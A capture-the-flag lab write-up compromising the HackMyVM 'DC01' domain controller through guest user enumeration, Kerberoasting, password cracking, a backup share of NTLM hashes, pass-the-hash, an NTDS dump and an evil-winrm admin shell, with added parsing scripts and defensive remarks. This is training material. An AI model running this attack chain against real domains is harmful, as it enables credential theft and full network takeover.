DC01 – HackMyVM

  • OS: Windows
  • Difficulty: Easy
  • Platform: HackMyVM



Summary

“DC01” is an easy-difficulty machine from the HackMyVM platform which introduces some Active Directory concepts. We are able to enumerate domain users through a guest account. We can then use Impacket's GetUserSPNs tool to obtain hashes for some users and attempt to crack them. We manage to crack one user's hash and obtain their password, which gives us access to a backup share. That share contains hashes for several users. One of these hashes works for a user with maximum privileges on the system, which gives us full control over it.


User

Starting with an Nmap scan shows multiple open ports: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 5985 Windows Remote Management (WinRM), among many others:

❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.20.1.140

Running some reconnaissance scripts (-sVC) against these ports shows:

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49670,49677,49694 10.20.1.140

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 20:23 -03
Nmap scan report for 1.20.1.140
Host is up (0.00052s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-18 03:23:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:43:08:EC (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-18T03:24:23
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:43:08:ec (Oracle VirtualBox virtual NIC)
|_clock-skew: 3h59m58s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.40 seconds

We are up against an Active Directory environment.

Running the NetExec tool against the SMB service shows:

❯ nxc smb 10.20.1.140

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)

We have a domain: SOUPEDECODE.LOCAL.

We are able to log in to the server over SMB as the guest user:

❯ nxc smb 10.20.1.140 -u 'guest' -p ''

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:

However, there is no interesting share we can read (which can be seen using the --shares flag):

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --shares

SMB         1.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         1.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         1.20.1.140     445    DC01             [*] Enumerated shares
SMB         1.20.1.140     445    DC01             Share           Permissions     Remark
SMB         1.20.1.140     445    DC01             -----           -----------     ------
SMB         1.20.1.140     445    DC01             ADMIN$                          Remote Admin
SMB         1.20.1.140     445    DC01             backup
SMB         1.20.1.140     445    DC01             C$                              Default share
SMB         1.20.1.140     445    DC01             IPC$            READ            Remote IPC
SMB         1.20.1.140     445    DC01             NETLOGON                        Logon server share
SMB         1.20.1.140     445    DC01             SYSVOL                          Logon server share
SMB         1.20.1.140     445    DC01             Users

There is a share called backup, but we do not have permission to read it as the current user.

Using NetExec's --rid-brute flag to obtain users returns something:

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute

SMB         1.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         1.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         1.20.1.140     445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         1.20.1.140     445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
SMB         1.20.1.140     445    DC01             501: SOUPEDECODE\Guest (SidTypeUser)
SMB         1.20.1.140     445    DC01             502: SOUPEDECODE\krbtgt (SidTypeUser)
<SNIP>
SMB         1.20.1.140     445    DC01             2162: SOUPEDECODE\PC-90$ (SidTypeUser)
SMB         1.20.1.140     445    DC01             2163: SOUPEDECODE\firewall_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2164: SOUPEDECODE\backup_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2165: SOUPEDECODE\web_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2168: SOUPEDECODE\admin (SidTypeUser)

We have multiple users.

After applying some grep filters, we can save all the potential users to a list by running:

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute | awk '{print $6}' | grep 'SOUPEDECODE' | grep -vE 'Enterprise|Domain|Schema|Group|Read-only|Cloneable|Cert|Key|RAS|Protected|Allowed|Denied|DnsAdmins|DnsUpdateProxy|guest:' | awk -F '\' '{print $2}' > potential_users.txt
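The grep pipeline above filters groups out by name, but the nxc output already states the SID type of every entry, so a parser can key on `(SidTypeUser)` and decide explicitly what to do with machine accounts (the trailing `$`). The following is an added example and not code from this writeup; the sample output is a constructed copy of a few rows in the shape of the `--rid-brute` listing above.

```python
import re

# Constructed sample in the shape of the `nxc smb ... --rid-brute` output shown above
# (same prefix columns, a handful of RIDs; not a capture of the real run).
SAMPLE_RID_BRUTE = r"""SMB         1.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         1.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         1.20.1.140     445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         1.20.1.140     445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
SMB         1.20.1.140     445    DC01             501: SOUPEDECODE\Guest (SidTypeUser)
SMB         1.20.1.140     445    DC01             502: SOUPEDECODE\krbtgt (SidTypeUser)
SMB         1.20.1.140     445    DC01             513: SOUPEDECODE\Domain Users (SidTypeGroup)
SMB         1.20.1.140     445    DC01             2162: SOUPEDECODE\PC-90$ (SidTypeUser)
SMB         1.20.1.140     445    DC01             2163: SOUPEDECODE\firewall_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2164: SOUPEDECODE\backup_svc (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType...>)"; the name may contain spaces, so it is
# matched lazily up to the SID-type suffix that closes every resolved line.
RID_LINE = re.compile(r"(\d+):\s+([^\\\s]+)\\(.+?)\s+\((SidType\w+)\)\s*$")


def parse_rid_brute(output):
    """Return (rid, domain, name, sid_type) for every resolved-RID line.

    Banner and login lines carry no RID and are skipped."""
    entries = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if not m:
            continue
        rid, domain, name, sid_type = m.groups()
        entries.append((int(rid), domain, name, sid_type))
    return entries


def user_accounts(output, include_machines=False):
    """sAMAccountNames of SidTypeUser entries.

    Machine accounts (trailing '$') are dropped unless asked for: they hold
    random 120-character passwords and are not candidates for a human password."""
    names = []
    for _rid, _domain, name, sid_type in parse_rid_brute(output):
        if sid_type != "SidTypeUser":
            continue
        if name.endswith("$") and not include_machines:
            continue
        names.append(name)
    return names


if __name__ == "__main__":
    # Same end result as the grep pipeline: one account name per line.
    print("\n".join(user_accounts(SAMPLE_RID_BRUTE)))
```

Keying on the SID type also avoids the false negatives of the name blacklist (a user named, say, `Cert_Admin` would be dropped by the `Cert` pattern above), and the RID itself is worth keeping: RIDs below 1000 are well-known built-in principals.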

Since we can enumerate users with NetExec as the guest user, and we now have a list of potential users, I will check whether we can extract hashes for these users with Impacket's GetUserSPNs.py tool:

❯ impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users.txt

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

We get the KRB_AP_ERR_SKEW error.

To avoid this error we can run sudo ntpdate -s 10.20.1.140 right before the command, which synchronizes the clocks of the server and our machine. Additionally, since the list is too long, I will “split” it in two using the sed command. As the potential-users file has 1069 lines, we can delete lines 600 through 1069 by running:

❯ sed '600,1069d' potential_users.txt > potential_users_part1.txt

And then save the second half by deleting the first 599 lines, again with sed:

❯ sed '1,599d' potential_users.txt > potential_users_part2.txt

Then we can request the hashes by running the command for both user lists (which are simply the original list split in two to avoid Kerberos timing problems):

❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part1.txt -outputfile hashes_found1

<SNIP>

❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part2.txt -outputfile hashes_found2

We can “join” both lists of obtained hashes using cat:

❯ cat hashes_found2 >> hashes_found1

and, after applying some filters, we obtain hashes for a few users:

❯ cat hashes_found1 | grep -vE 'PC\$|PC-'

$krb5tgs$18$krbtgt$SOUPEDECODE.LOCAL$*krbtgt*$4ecd7ed4b5252754de6b967d$<SNIP>
$krb5tgs$18$DC01$$SOUPEDECODE.LOCAL$*DC01$*$bf907a7ce2b3ef5e3e4a7cfd$<SNIP>
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$73c009074156218414b4d20086bc2e38$<SNIP>
<SNIP>

I decide to discard the hashes belonging to users with PC in their names and create a list with the rest:

❯ cat hashes_found1 | grep -vE 'PC\$|PC-' > filtered_hashes

and I try to crack these hashes through Brute Force Password Cracking with the rockyou.txt dictionary and the John the Ripper tool:

❯ john --wordlist=/usr/share/wordlists/rockyou.txt filtered_hashes

Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!!    (?)
1g 0:00:01:07 DONE (2024-10-17 21:40) 0.01480g/s 212311p/s 3131Kc/s 3131KC/s  0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We get a password: Password123!!.

The password belongs to one of these users:

❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*'

krbtgt
DC01
file_svc
WebServer
DatabaseServer
FileServer
MailServer
BackupServer
ApplicationServer
PrintServer
ProxyServer
MonitoringServer
CitrixServer
firewall_svc
backup_svc
web_svc
monitoring_svc

So we save them:

❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*' > potential_hash_user.txt
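The awk/tr pipeline pulls the account name out of the fourth `$`-delimited field, but the second field (the etype) is the one that explains the numbers above: 17 names are listed, yet John reports `Loaded 15 password hashes` for the `krb5tgs` format tagged `[MD4 HMAC-MD5 RC4]`, i.e. etype 23 only, which is consistent with the two etype 18 (AES256) entries for krbtgt and DC01$ not being loaded. The parser below is an added example, not the author's code; the sample lines reuse the account, realm and checksum fields visible above and the trailing ciphertext hex is made up.

```python
import re

# Constructed sample lines in the John/hashcat $krb5tgs$ layout written by
# GetUserSPNs -outputfile. Account/realm/checksum fields mirror the lines shown
# above; the trailing encrypted-data hex is a placeholder.
SAMPLE_HASHES = [
    "$krb5tgs$18$krbtgt$SOUPEDECODE.LOCAL$*krbtgt*$4ecd7ed4b5252754de6b967d$" + "ab" * 24,
    "$krb5tgs$18$DC01$$SOUPEDECODE.LOCAL$*DC01$*$bf907a7ce2b3ef5e3e4a7cfd$" + "cd" * 24,
    "$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$73c009074156218414b4d20086bc2e38$" + "ef" * 24,
    "$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$backup_svc*$" + "0f" * 16 + "$" + "12" * 24,
]

# Kerberos encryption-type numbers as they appear in the second field.
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

# etype 23 layout: $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$edata
# The user is matched lazily so machine accounts ending in '$' still parse.
RC4_LINE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>.+?)\$(?P<realm>[^$*]+)\$(?P<spn>.*?)\*\$"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
# etype 17/18 layout: $krb5tgs$18$user$REALM$*spn*$checksum(12 bytes)$edata
AES_LINE = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>.+?)\$(?P<realm>[^$*]+)\$\*(?P<spn>.*?)\*\$"
    r"(?P<checksum>[0-9a-f]{24})\$(?P<edata>[0-9a-f]+)$"
)


def parse_krb5tgs(line):
    """Split one $krb5tgs$ line into etype, account, realm and SPN."""
    m = RC4_LINE.match(line)
    if m:
        return {"etype": 23, "user": m["user"], "realm": m["realm"], "spn": m["spn"]}
    m = AES_LINE.match(line)
    if m:
        return {"etype": int(m["etype"]), "user": m["user"], "realm": m["realm"], "spn": m["spn"]}
    raise ValueError(f"not a $krb5tgs$ line: {line[:40]!r}")


def by_cipher(lines):
    """Group account names by the cipher their service ticket was issued with.

    Only the rc4-hmac bucket is what John's krb5tgs format loads; AES tickets
    need the AES-specific modes and are far slower to attack offline."""
    groups = {}
    for line in lines:
        rec = parse_krb5tgs(line)
        name = ETYPE_NAMES.get(rec["etype"], f"etype-{rec['etype']}")
        groups.setdefault(name, []).append(rec["user"])
    return groups


if __name__ == "__main__":
    for cipher, users in by_cipher(SAMPLE_HASHES).items():
        print(f"{cipher}: {', '.join(users)}")
```

The defensive reading of the same split: the accounts that end up in the rc4-hmac bucket are the ones whose SPNs still get RC4 tickets, so an audit of msDS-SupportedEncryptionTypes on service accounts (AES-only) and long random passwords for them are what remove this path; the request itself shows up on the DC as a 4769 event with ticket encryption type 0x17.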

And I check which user the found password belongs to with NetExec:

❯ nxc smb 10.20.1.140 -u potential_hash_user.txt -p 'Password123!!' --continue-on-success | grep -v 'Guest'

SMB                      10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\firewall_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\backup_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\web_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\monitoring_svc:Password123!! STATUS_LOGON_FAILURE

We have a password for the user file_svc. So we have the credentials file_svc:Password123!!.


NT Authority/System - Administrator

This user is not able to log in to the victim machine over WinRM. However, if we check which shares it can read, we can see that this user can read the backup share over SMB:

❯ nxc smb 10.20.1.140 -u 'file_svc' -p 'Password123!!' --shares --filter-shares READ

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB         10.20.1.140     445    DC01             [*] Enumerated shares
SMB         10.20.1.140     445    DC01             Share           Permissions     Remark
SMB         10.20.1.140     445    DC01             -----           -----------     ------
SMB         10.20.1.140     445    DC01             backup          READ
SMB         10.20.1.140     445    DC01             IPC$            READ            Remote IPC
SMB         10.20.1.140     445    DC01             NETLOGON        READ            Logon server share
SMB         10.20.1.140     445    DC01             SYSVOL          READ            Logon server share

We can then use the smbmap tool to see the contents of this share:

❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' -r 'backup' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.20.1.140:445 Name: 10.20.1.140               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        backup                                                  READ ONLY
        ./backup
        dr--r--r--                0 Mon Jun 17 13:41:17 2024    .
        dw--w--w--                0 Mon Jun 17 13:44:56 2024    ..
        fr--r--r--              892 Mon Jun 17 13:41:23 2024    backup_extract.txt
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   NO ACCESS
[*] Closed 1 connections

There is a file called backup_extract.txt.

We download it with smbmap and the --download flag:

❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' --download 'backup/backup_extract.txt' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: backup\backup_extract.txt (892 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/HackMyVM/DC01/content/10.20.1.140-backup_backup_extract.txt
[*] Closed 1 connections

Reading its contents shows a series of NTLM hashes.

❯ cat 10.20.1.140-backup_backup_extract.txt

WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::

Therefore, since we have multiple potential users, we can attempt a Pass The Hash attack with these hashes against all the potential users, as one of them might work. We save these hashes:

❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}'

c47b45f5d4df5a494bd19f13e14f7902
406b424c7b483a42458bf6f545c936f7
48fc7eca9af236d7849273990f6c5117
e41da7e79a4c76dbd9cf79d1cb325559
46a4655f18def136b3bfab7b0b4e70e3
46a4655f18def136b3bfab7b0b4e70e3
8cd90ac6cba6dde9d8038b068c17e9f5
b8a38c432ac59ed00b2a373f4f050d28
4e3f0bb3e5b6e3e662611b1a87988881
48fc7eca9af236d7849273990f6c5117

❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}' > leaked_hashes
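The `awk -F :` above only keeps the fourth field, but the file is worth parsing properly: the format is pwdump style (`user:rid:LM:NT:::`), the LM field `aad3b435b51404eeaad3b435b51404ee` is the hash of an empty LM password (LM storage is off), and two pairs of accounts in the listing share an NT hash, which means an identical password because NT hashes are unsalted. The audit below is an added example, not the author's code; its input is the backup_extract.txt listing shown above.

```python
from collections import defaultdict

# LM hash of the empty string: what Windows stores when LM hashes are disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# The backup_extract.txt lines shown above, in pwdump format user:rid:LM:NT:::
SAMPLE_DUMP = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
"""


def parse_pwdump(text):
    """Parse user:rid:LM:NT::: lines; reject anything that is not two 32-hex hashes."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad hash length on line for {user!r}")
        records.append({"user": user, "rid": rid, "lm": lm, "nt": nt})
    return records


def shared_nt_hashes(records):
    """NT hash -> accounts that share it, for hashes used by two or more accounts.

    NT hashing has no per-user salt, so equal hashes mean equal passwords."""
    by_hash = defaultdict(list)
    for r in records:
        by_hash[r["nt"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def audit(text):
    """Summary a reviewer of such a backup would want: counts, LM presence, reuse."""
    records = parse_pwdump(text)
    return {
        "accounts": len(records),
        "machine_accounts": sum(r["user"].endswith("$") for r in records),
        "lm_hashes_present": sum(r["lm"] != EMPTY_LM for r in records),
        "reused": shared_nt_hashes(records),
    }


if __name__ == "__main__":
    result = audit(SAMPLE_DUMP)
    print(f"{result['accounts']} accounts, {result['machine_accounts']} machine accounts, "
          f"{result['lm_hashes_present']} with an LM hash")
    for nt, users in result["reused"].items():
        print(f"shared NT hash {nt}: {', '.join(users)}")
```

A file like this sitting on a share readable by a low-privileged service account is the actual finding here: an NT hash is a credential equivalent, so the backup is as sensitive as the passwords themselves, and the reuse between MailServer$/BackupServer$ and CitrixServer$/MonitoringServer$ means one cracked or replayed hash covers two accounts.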

Then, using NetExec again with the hashes we found, we check whether any of them works for the users we found at the beginning:

❯ nxc smb 10.20.1.140 -u potential_users.txt -H leaked_hashes

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\Guest:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
<SNIP>
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)

One of the hashes works for the user FileServer$. Additionally, I can see the Pwn3d! message over the SMB service, which means the FileServer$ user has maximum privileges on the victim machine.

Therefore, and although this user is already technically an administrator, we can use NetExec to dump all the hashes on the system. In this case I will simply dump the Administrator user's hash:

❯ nxc smb 10.20.1.140 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559 --ntds --user Administrator

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
SMB         10.20.1.140     445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.20.1.140     445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f:::
SMB         10.20.1.140     445    DC01             [+] Dumped 1 NTDS hashes to /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds of which 1 were added to the database
SMB         10.20.1.140     445    DC01             [*] To extract only enabled accounts from the output file, run the following command:
SMB         10.20.1.140     445    DC01             [*] cat /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | grep -iv disabled | cut -d ':' -f1
SMB         10.20.1.140     445    DC01             [*] grep -iv disabled /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | cut -d ':' -f1

And I use this hash together with evil-winrm to connect to the victim machine over the WinRM service:

❯ evil-winrm -i 10.20.1.140 -u 'Administrator' -H '88d40c3a9a98889f5cbb778b0db54a2f'

Evil-WinRM shell v3.6

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

soupedecode\administrator

GG.

~Happy Hacking.